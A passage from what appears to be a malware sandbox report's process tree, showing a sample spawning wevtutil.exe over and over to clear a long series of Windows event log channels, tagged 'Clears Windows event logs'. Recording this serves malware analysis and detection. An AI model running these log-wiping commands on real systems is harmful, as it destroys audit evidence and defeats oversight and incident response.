        wevtutil.exe cl "Microsoft-Windows-IME-JPSetting/Analytic"
        7⤵
        
        PID:5244
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-JPTIP/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:5260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-KRAPI/Analytic"
        7⤵
        
        PID:2088
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-KRTIP/Analytic"
        7⤵
        
        PID:5328
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-OEDCompiler/Analytic"
        7⤵
        
        PID:2752
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-TCCORE/Analytic"
        7⤵
        
        PID:5344
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-TCTIP/Analytic"
        7⤵
        
        PID:3944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IME-TIP/Analytic"
        7⤵
        
        PID:376
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IPNAT/Diagnostic"
        7⤵
        
        PID:1116
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
        7⤵
        
        PID:2328
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Debug"
        7⤵
        
        PID:4392
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Operational"
        7⤵
        
        PID:2248
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IdCtrls/Analytic"
        7⤵
        
        PID:5436
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IdCtrls/Operational"
        7⤵
        
        PID:1620
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"
        7⤵
        
        PID:3200
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Input-HIDCLASS-Analytic"
        7⤵
        
        PID:1576
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-InputSwitch/Diagnostic"
        7⤵
        
        PID:4684
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
        7⤵
        
        PID:2592
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
        7⤵
        
        PID:8
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
        7⤵
        
        PID:3548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
        7⤵
        
        PID:2480
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-KdsSvc/Operational"
        7⤵
        
        PID:2368
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kerberos/Operational"
        7⤵
        
        PID:3408
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
        7⤵
        
        PID:3056
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/General"
        7⤵
        
        PID:3764
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/Performance"
        7⤵
        
        PID:4576
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Analytic"
        7⤵
        
        PID:2416
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Debug"
        7⤵
        
        PID:980
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Operational"
        7⤵
        
        PID:5112
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
        7⤵
        
        PID:4544
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Operational"
        7⤵
        
        PID:1004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
        7⤵
        
        PID:5968
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
        7⤵
        
        PID:1976
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
        7⤵
        
        PID:2520
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
        7⤵
        
        PID:5556
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
        7⤵
        
        PID:5520
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-IO/Operational"
        7⤵
        
        PID:5508
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"
        7⤵
        
        PID:1684
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-IoTrace/Diagnostic"
        7⤵
        
        PID:2032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Analytic"
        7⤵
        
        PID:3784
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Operational"
        7⤵
        
        PID:4072
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
        7⤵
        
        PID:4756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
        7⤵
        
        PID:5104
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Pdc/Diagnostic"
        7⤵
        
        PID:3480
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Pep/Diagnostic"
        7⤵
        
        PID:4184
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"
        7⤵
        
        PID:1944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration"
        7⤵
        
        PID:2984
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"
        7⤵
        
        PID:4740
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"
        7⤵
        
        PID:392
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"
        7⤵
        
        PID:3176
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Watchdog"
        7⤵
        
        PID:5372
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:4972
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
        7⤵
        
        PID:5564
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
        7⤵
        
        PID:4440
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
        7⤵
        
        PID:640
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
        7⤵
        
        PID:2844
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
        7⤵
        
        PID:1688
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
        7⤵
        
        PID:3616
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Performance"
        7⤵
        
        PID:732
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Debug"
        7⤵
        
        PID:1948
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"
        7⤵
        
        PID:3628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Operational"
        7⤵
        
        PID:5576
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
        7⤵
        
        PID:3768
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
        7⤵
        
        PID:4536
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
        7⤵
        
        PID:1492
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
        7⤵
        
        PID:2524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
        7⤵
        
        PID:5396
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
        7⤵
        
        PID:2352
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
        7⤵
        
        PID:5636
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-XDV/Analytic"
        7⤵
        
        PID:3220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Admin"
        7⤵
        
        PID:4416
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Operational"
        7⤵
        
        PID:3684
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Performance"
        7⤵
        
        PID:4076
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
        7⤵
        
        PID:5692
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
        7⤵
        
        PID:5656
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LAPS/Operational"
        7⤵
        
        PID:5628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
        7⤵
        
        PID:2044
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LSA/Diagnostic"
        7⤵
        
        PID:1444
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LSA/Operational"
        7⤵
        
        PID:5800
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LSA/Performance"
        7⤵
        
        PID:2056
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
        7⤵
        
        PID:5788
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
        7⤵
        
        PID:5784
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
        7⤵
        
        PID:5884
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
        7⤵
        
        PID:1236
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LimitsManagement/Diagnostic"
        7⤵
        
        PID:5856
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"
        7⤵
        
        PID:5860
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"
        7⤵
        Clears Windows event logs
        
        PID:4312
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LiveId/Analytic"
        7⤵
        
        PID:5832
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LiveId/Operational"
        7⤵
        
        PID:5852
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"
        7⤵
        
        PID:5928
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
        7⤵
        
        PID:5932
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
        7⤵
        
        PID:2736
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
        7⤵
        
        PID:292
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSFTEDIT/Diagnostic"
        7⤵
        
        PID:304
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
        7⤵
        
        PID:5100
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
        7⤵
        
        PID:4672
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
        7⤵
        
        PID:6000
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
        7⤵
        Clears Windows event logs
        
        PID:6024
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
        7⤵
        
        PID:6100
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
        7⤵
        
        PID:3520
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
        7⤵
        
        PID:2628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMC"
        7⤵
        
        PID:1352
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMR"
        7⤵
        
        PID:3532
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Media-Streaming/MDE"
        7⤵
        
        PID:1404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"
        7⤵
        
        PID:2300
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
        7⤵
        
        PID:2564
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
        7⤵
        
        PID:1748
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
        7⤵
        
        PID:2140
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-Performance/SARStreamResource"
        7⤵
        
        PID:1260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
        7⤵
        
        PID:1920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
        7⤵
        
        PID:4252
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Minstore/Analytic"
        7⤵
        
        PID:4504
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Minstore/Debug"
        7⤵
        
        PID:5596
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic"
        7⤵
        
        PID:4588
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api/Analytic"
        7⤵
        
        PID:3952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Analytic"
        7⤵
        
        PID:5756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational"
        7⤵
        
        PID:5664
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-SmsApi/Analytic"
        7⤵
        
        PID:2420
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
        7⤵
        
        PID:4484
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Admin"
        7⤵
        
        PID:4952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Autopilot"
        7⤵
        
        PID:5140
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Debug"
        7⤵
        
        PID:5124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Diagnostics"
        7⤵
        
        PID:2116
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/ManagementService"
        7⤵
        
        PID:1828
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Mprddm/Operational"
        7⤵
        
        PID:4196
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
        7⤵
        
        PID:2020
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
        7⤵
        
        PID:3032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
        7⤵
        
        PID:5196
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
        7⤵
        
        PID:6128
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
        7⤵
        
        PID:6048
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
        7⤵
        
        PID:4324
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
        7⤵
        
        PID:1284
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
        7⤵
        
        PID:824
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
        7⤵
        
        PID:4124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Ncasvc/Operational"
        7⤵
        
        PID:5516
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Diagnostic"
        7⤵
        
        PID:228
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Operational"
        7⤵
        Clears Windows event logs
        
        PID:4424
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NdisImPlatform/Operational"
        7⤵
        
        PID:4244
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Ndu/Diagnostic"
        7⤵
        
        PID:5232
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
        7⤵
        
        PID:5252
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Network-Connection-Broker"
        7⤵
        
        PID:5264
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Network-DataUsage/Analytic"
        7⤵
        
        PID:5284
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Network-Setup/Diagnostic"
        7⤵
        
        PID:2908
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
        7⤵
        
        PID:5304
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkBridge/Diagnostic"
        7⤵
        
        PID:5312
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
        7⤵
        Clears Windows event logs
        
        PID:5316
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
        7⤵
        
        PID:2164
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
        7⤵
        
        PID:2460
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProvider/Operational"
        7⤵
        
        PID:900
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Analytic"
        7⤵
        
        PID:3160
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Operational"
        7⤵
        
        PID:5028
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkSecurity/Debug"
        7⤵
        
        PID:2996
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkStatus/Analytic"
        7⤵
        
        PID:1600
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
        7⤵
        
        PID:4716
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Networking-RealTimeCommunication/Tracing"
        7⤵
        Clears Windows event logs
        System Time Discovery
        
        PID:1112
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
        7⤵
        
        PID:876
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
        7⤵
        
        PID:1668
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Ntfs/Operational"
        7⤵
        
        PID:5320
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Ntfs/Performance"
        7⤵
        
        PID:5004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Ntfs/WHC"
        7⤵
        
        PID:4628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OLE/Clipboard-Performance"
        7⤵
        
        PID:2100
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
        7⤵
        
        PID:4004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
        7⤵
        
        PID:3940
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OOBE-FirstLogonAnim/Diagnostic"
        7⤵
        
        PID:4492
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-Core/Diagnostic"
        7⤵
        
        PID:1580
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Diagnostic"
        7⤵
        
        PID:1264
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Operational"
        7⤵
        
        PID:1256
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-Plugins-Wireless/Diagnostic"
        7⤵
        
        PID:1552
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OcpUpdateAgent/Operational"
        7⤵
        
        PID:4848
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
        7⤵
        
        PID:2392
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
        7⤵
        
        PID:340
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
        7⤵
        
        PID:1788
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
        7⤵
        
        PID:2688
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OneBackup/Debug"
        7⤵
        
        PID:4564
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
        7⤵
        
        PID:2488
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OneX/Operational"
        7⤵
        
        PID:5504
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
        7⤵
        
        PID:5292
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OtpCredentialProvider/Operational"
        7⤵
        
        PID:5360
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
        7⤵
        
        PID:1940
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Analytic"
        7⤵
        
        PID:4304
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Debug"
        7⤵
        
        PID:5612
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Operational"
        7⤵
        
        PID:4464
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
        7⤵
        
        PID:4668
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Partition/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:3400
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Partition/Diagnostic"
        7⤵
        
        PID:4980
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
        7⤵
        
        PID:2036
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PerceptionRuntime/Operational"
        7⤵
        
        PID:1184
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PerceptionSensorDataService/Operational"
        7⤵
        
        PID:5772
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:1460
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Diagnostic"
        7⤵
        
        PID:2296
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Operational"
        7⤵
        
        PID:5368
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:4524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Diagnostic"
        7⤵
        
        PID:5468
        
        C:\Windows\system32\wevtutil.exe
        
